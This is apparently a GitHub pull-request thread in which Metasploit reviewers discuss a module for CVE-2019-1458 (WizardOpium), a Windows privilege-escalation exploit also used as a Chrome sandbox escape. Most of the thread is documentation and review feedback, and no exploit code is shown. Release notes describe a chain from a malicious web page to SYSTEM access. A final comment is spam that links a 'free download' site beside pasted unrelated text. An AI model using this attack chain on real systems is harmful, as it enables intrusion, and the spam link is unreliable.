2020-10-10 01:59 UTC, gwillcox-r7 commented on modules/exploits/windows/local/ntusermessagecall.rb
> +    elsif sysinfo_value =~ /8/ && build_num == 9600
Pushed up a fix for this so I'm marking this as resolved now.

2020-10-10 02:00 UTC, gwillcox-r7 commented on modules/exploits/windows/local/ntusermessagecall.rb
> +    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
Pushed up a fix for this, marking as resolved.

2020-10-10 02:12 UTC, gwillcox-r7 commented
@timwr Just realized after all of this that the documentation for `exploits/multi/browser/chrome_object_create.rb` will also need to be updated now that we added in extra options and since the line we have in that documentation about `**This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option**` is no longer applicable.

2020-10-12 10:49 UTC, timwr commented
The changes you made look great! I re-tested it again with target 1 and it works. I will update the documentation with the results. Thanks @gwillcox-r7 !

2020-10-13 20:00 UTC, gwillcox-r7 requested changes
Minor changes required, otherwise this is pretty much ready to go. Left some comments for reference but I can go ahead and make these edits myself.

2020-10-13 20:00 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/browser/chrome_object_create.md
> +1. Do: ```set target 0```
Eh technically speaking this implies that this value will always be 0. Minor complaint though. Main thing I am noticing when looking at this documentation is that we don't have an `Options` section. So I was a little confused at first why we didn't list the various options for `target` and explain what they did. Might be an idea to add that in to this documentation file to bring it up to date.

Otherwise changes on this look good, thanks for doing this!

2020-10-13 20:00 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/browser/chrome_object_create.md
> +Additionally the exploit can cause the target machine to restart when the session is terminated. A BSOD is also likely to occur when the system is shut down or rebooted.
These lines look great but my concern is that you have individual lines that are way too long, when they should be broken up into multiple lines (even if they are within the same sentence). Can you run `tools/dev/msftidy_docs.rb` on this file and try address some of the concerns it raises? It should note a few things such as long lines like these that can be tidied up to help make the documentation easier to read.

2020-10-15 08:09 UTC, timwr commented
@gwillcox-r7 I've addressed most of the msftidy_docs issues, but I still get the following:
```
documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] Docs should start with ## Vulnerable Application
documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] Missing Section: ## Options
documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
documentation/modules/exploit/multi/browser/chrome_object_create.md:22 - [WARNING] Line too long (153). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
```
I'm not sure about the remaining ones:
1) The docs start with a description (not ## Vulnerable Application), as does the module_doc_template.md and every other doc.
2) There are no non-standard options that need to be documented, so I left out ## Options
3) See 1).
4) There is no way to split up this hyperlink into multiple lines.

2020-10-15 14:44 UTC, gwillcox-r7 commented
@timwr The template is a bit old and may not have been updated. I think we now just generally place that description section under `## Vulnerable Application`. As for point 2, that is a known issue with the script as we have it at the moment, and normally I would ignore it, however there is still value in documenting your various `Target` options here. I will do this so long. As for point 3, that is a consequence of point 1. And finally point 4 can be safely ignored, we will potentially be looking at a fix for this in the future as it is a known issue of our checks but right now its not anything that will break expectations.

2020-10-15 15:03 UTC, gwillcox-r7 commented
@timwr With last updates this should be ready to land, so going to just go ahead and do some rebasing to clear up the commit history and then land this in. Thanks for your patience on this!

2020-10-15 16:19 UTC, gwillcox-r7 approved these changes

2020-10-15 17:47 UTC, merged

2020-10-15 17:51 UTC, gwillcox-r7 commented
# Release Notes
This PR adds support for exploiting CVE-2019-1458, aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits CVE-2018-17463 in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.

2020-10-28 15:37 UTC, pbarry-r7 commented
# Release Notes

New module <code>exploit/windows/local/cve_2019_1458_wizardopium</code> can be used standalone local exploit <a href="https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=msfReleaseNotes">CVE-2019-1458</a> (aka WizardOpium) to achieve LPE on vulnerable Windows targets or as a sandbox escape option with <code>exploit/multi/browser/chrome_object_create</code>.

2021-09-05 16:49 UTC, FreeSoftwareFiles commented
UTODATA 3.45 Free Download for Windows either based on 32 bit or 64 bit Windows you can grab the 64bit here: 
https://freesoftwarefiles.net/cnc-machines/autodata-3-45-free-download/
The bug is due to uninitialized memory, so you only get one chance to exploit it and subsequent attempts will fail. It's 100% reliable for me on Windows 7 SP1, but the box crashes after I exit the session and I'm not sure how to fix that.